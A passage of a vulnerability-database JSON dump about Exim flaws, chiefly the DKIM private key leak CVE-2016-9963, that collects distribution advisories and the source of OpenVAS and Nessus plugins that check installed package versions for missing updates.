Prerequire permissions (fixes rpmlint).\n\n - conditionally disable DANE on SuSE versions with OpenSSL 1.0\n\n - CVE-2016-1531: when installed setuid root, allows local users to gain\n privileges via the perl_startup argument.\n\n - CVE-2016-9963: DKIM information leakage (boo#1015930)\n\n\n - Makefile tuning:\n + add sqlite support\n + disable WITH_OLD_DEMIME\n + enable AUTH_CYRUS_SASL\n + enable AUTH_TLS\n + enable SYSLOG_LONG_LINES\n + enable SUPPORT_PAM\n + MAX_NAMED_LIST=64\n + enable EXPERIMENTAL_DMARC\n + enable EXPERIMENTAL_EVENT\n + enable EXPERIMENTAL_PROXY\n + enable EXPERIMENTAL_CERTNAMES\n + enable EXPERIMENTAL_DSN\n + enable EXPERIMENTAL_DANE\n + enable EXPERIMENTAL_SOCKS\n + enable EXPERIMENTAL_INTERNATIONAL\");\n\n script_tag(name:\"affected\", value:\"exim on openSUSE Leap 42.3, openSUSE Leap 42.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:2289-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSELeap42\\.2|openSUSELeap42\\.3)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.86.2~10.6.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debuginfo\", rpm:\"exim-debuginfo~4.86.2~10.6.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debugsource\", rpm:\"exim-debugsource~4.86.2~10.6.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon\", rpm:\"eximon~4.86.2~10.6.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon-debuginfo\", rpm:\"eximon-debuginfo~4.86.2~10.6.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximstats-html\", rpm:\"eximstats-html~4.86.2~10.6.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.86.2~14.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debuginfo\", rpm:\"exim-debuginfo~4.86.2~14.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debugsource\", rpm:\"exim-debugsource~4.86.2~14.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon\", rpm:\"eximon~4.86.2~14.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon-debuginfo\", rpm:\"eximon-debuginfo~4.86.2~14.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximstats-html\", rpm:\"eximstats-html~4.86.2~14.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:24", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9963"], "description": "\nThe Exim project reports:\n\nExim leaks the private DKIM signing key to the log files.\n\t Additionally, if the build option EXPERIMENTAL_DSN_INFO=yes is used,\n\t the key material is included in the bounce message.\n\n", "edition": 7, "modified": "2016-12-15T00:00:00", "published": "2016-12-15T00:00:00", "id": "E7002B26-CAAA-11E6-A76A-9F7324E5534E", "href": "https://vuxml.freebsd.org/freebsd/e7002b26-caaa-11e6-a76a-9f7324e5534e.html", "title": "exim -- DKIM private key leak", "type": "freebsd", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}], "debian": [{"lastseen": "2020-08-12T01:10:04", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9963"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3747-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nDecember 25, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : exim4\nCVE ID : CVE-2016-9963\n\nBjoern Jacke discovered that Exim, Debian's default mail transfer agent,\nmay leak the private DKIM signing key to the log files if specific\nconfiguration options are met.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 4.84.2-2+deb8u2.\n\nWe recommend that you upgrade your exim4 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2016-12-25T10:08:40", "published": "2016-12-25T10:08:40", "id": "DEBIAN:DSA-3747-1:65DFE", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00331.html", "title": "[SECURITY] [DSA 3747-1] exim4 security update", "type": "debian", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-30T02:21:28", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9963"], "description": "Package : exim4\nVersion : 4.80-7+deb7u4\nCVE ID : CVE-2016-9963\n\n\nBjoern Jacke discovered that Exim, Debian's default mail transfer agent,\nmay leak the private DKIM signing key to the log files if specific\nconfiguration options are met.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n4.80-7+deb7u4.\n\nWe recommend that you upgrade your exim4 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 3, "modified": "2016-12-25T11:32:10", "published": "2016-12-25T11:32:10", "id": "DEBIAN:DLA-762-1:0D8D2", "href": "https://lists.debian.org/debian-lts-announce/2016/debian-lts-announce-201612/msg00038.html", "title": "[SECURITY] [DLA 762-1] exim4 security update", "type": "debian", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}], "amazon": [{"lastseen": "2020-11-10T12:37:37", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9963"], "description": "**Issue Overview:**\n\nIt was found that Exim leaked DKIM signing private keys to the "mainlog" log file. As a result, an attacker with access to system log files could potentially access these leaked DKIM private keys.\n\n \n**Affected Packages:** \n\n\nexim\n\n \n**Issue Correction:** \nRun _yum update exim_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n exim-4.88-2.11.amzn1.i686 \n exim-mon-4.88-2.11.amzn1.i686 \n exim-mysql-4.88-2.11.amzn1.i686 \n exim-pgsql-4.88-2.11.amzn1.i686 \n exim-debuginfo-4.88-2.11.amzn1.i686 \n exim-greylist-4.88-2.11.amzn1.i686 \n \n src: \n exim-4.88-2.11.amzn1.src \n \n x86_64: \n exim-pgsql-4.88-2.11.amzn1.x86_64 \n exim-mon-4.88-2.11.amzn1.x86_64 \n exim-debuginfo-4.88-2.11.amzn1.x86_64 \n exim-mysql-4.88-2.11.amzn1.x86_64 \n exim-4.88-2.11.amzn1.x86_64 \n exim-greylist-4.88-2.11.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2017-03-06T14:00:00", "published": "2017-03-06T14:00:00", "id": "ALAS-2017-804", "href": "https://alas.aws.amazon.com/ALAS-2017-804.html", "title": "Medium: exim", "type": "amazon", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2021-01-01T01:19:32", "description": "It was found that Exim leaked DKIM signing private keys to the\n'mainlog' log file. As a result, an attacker with access to system log\nfiles could potentially access these leaked DKIM private keys.", "edition": 25, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-03-07T00:00:00", "title": "Amazon Linux AMI : exim (ALAS-2017-804)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9963"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:exim-mysql", "p-cpe:/a:amazon:linux:exim-mon", "p-cpe:/a:amazon:linux:exim-debuginfo", "p-cpe:/a:amazon:linux:exim", "p-cpe:/a:amazon:linux:exim-greylist", "p-cpe:/a:amazon:linux:exim-pgsql", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2017-804.NASL", "href": "https://www.tenable.com/plugins/nessus/97556", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2017-804.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97556);\n script_version(\"3.2\");\n script_cvs_date(\"Date: 2018/04/18 15:09:36\");\n\n script_cve_id(\"CVE-2016-9963\");\n script_xref(name:\"ALAS\", value:\"2017-804\");\n\n script_name(english:\"Amazon Linux AMI : exim (ALAS-2017-804)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was found that Exim leaked DKIM signing private keys to the\n'mainlog' log file. As a result, an attacker with access to system log\nfiles could potentially access these leaked DKIM private keys.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2017-804.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update exim' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-greylist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-mon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"exim-4.88-2.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-debuginfo-4.88-2.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-greylist-4.88-2.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-mon-4.88-2.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-mysql-4.88-2.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-pgsql-4.88-2.11.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-greylist / exim-mon / exim-mysql / etc\");\n}\n", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-06T10:59:28", "description": "The Exim project reports :\n\nExim leaks the private DKIM signing key to the log files.\nAdditionally, if the build option EXPERIMENTAL_DSN_INFO=yes is used,\nthe key material is included in the bounce message.", "edition": 29, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2016-12-27T00:00:00", "title": "FreeBSD : exim -- DKIM private key leak (e7002b26-caaa-11e6-a76a-9f7324e5534e)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9963"], "modified": "2016-12-27T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:exim"], "id": "FREEBSD_PKG_E7002B26CAAA11E6A76A9F7324E5534E.NASL", "href": "https://www.tenable.com/plugins/nessus/96122", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96122);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-9963\");\n\n script_name(english:\"FreeBSD : exim -- DKIM private key leak (e7002b26-caaa-11e6-a76a-9f7324e5534e)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Exim project reports :\n\nExim leaks the private DKIM signing key to the log files.\nAdditionally, if the build option EXPERIMENTAL_DSN_INFO=yes is used,\nthe key material is included in the bounce message.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://exim.org/static/doc/CVE-2016-9963.txt\"\n );\n # https://vuxml.freebsd.org/freebsd/e7002b26-caaa-11e6-a76a-9f7324e5534e.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?02b7365f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim>4.69<4.87.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:pkg_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-12T09:44:11", "description": "Bjoern Jacke discovered that Exim, Debian's default mail transfer\nagent, may leak the private DKIM signing key to the log files if\nspecific configuration options are met.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n4.80-7+deb7u4.\n\nWe recommend that you upgrade your exim4 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 22, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2016-12-27T00:00:00", "title": "Debian DLA-762-1 : exim4 security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9963"], "modified": "2016-12-27T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:exim4-daemon-heavy-dbg", "p-cpe:/a:debian:debian_linux:exim4-daemon-heavy", "p-cpe:/a:debian:debian_linux:exim4-base", "p-cpe:/a:debian:debian_linux:exim4-daemon-light-dbg", "p-cpe:/a:debian:debian_linux:exim4-daemon-light", "p-cpe:/a:debian:debian_linux:eximon4", "p-cpe:/a:debian:debian_linux:exim4-dbg", "cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:exim4-config", "p-cpe:/a:debian:debian_linux:exim4", "p-cpe:/a:debian:debian_linux:exim4-dev"], "id": "DEBIAN_DLA-762.NASL", "href": "https://www.tenable.com/plugins/nessus/96097", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-762-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96097);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-9963\");\n\n script_name(english:\"Debian DLA-762-1 : exim4 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Bjoern Jacke discovered that Exim, Debian's default mail transfer\nagent, may leak the private DKIM signing key to the log files if\nspecific configuration options are met.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n4.80-7+deb7u4.\n\nWe recommend that you upgrade your exim4 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/12/msg00038.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/exim4\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-heavy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-heavy-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-light\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-light-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:eximon4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"exim4\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-base\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-config\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-heavy\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-heavy-dbg\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-light\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-light-dbg\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-dbg\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-dev\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"eximon4\", reference:\"4.80-7+deb7u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:deb_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T06:44:17", "description": "Bjoern Jacke discovered that Exim incorrectly handled DKIM keys. In\ncertain configurations, private DKIM signing keys could be leaked to\nthe log files.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 31, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-01-06T00:00:00", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 16.04 LTS / 16.10 : exim4 vulnerability (USN-3164-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9963"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04", "p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy", "cpe:/o:canonical:ubuntu_linux:16.10", "p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3164-1.NASL", "href": "https://www.tenable.com/plugins/nessus/96336", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3164-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96336);\n script_version(\"3.9\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-9963\");\n script_xref(name:\"USN\", value:\"3164-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 16.04 LTS / 16.10 : exim4 vulnerability (USN-3164-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Bjoern Jacke discovered that Exim incorrectly handled DKIM keys. In\ncertain configurations, private DKIM signing keys could be leaked to\nthe log files.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3164-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected exim4-daemon-heavy and / or exim4-daemon-light\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n 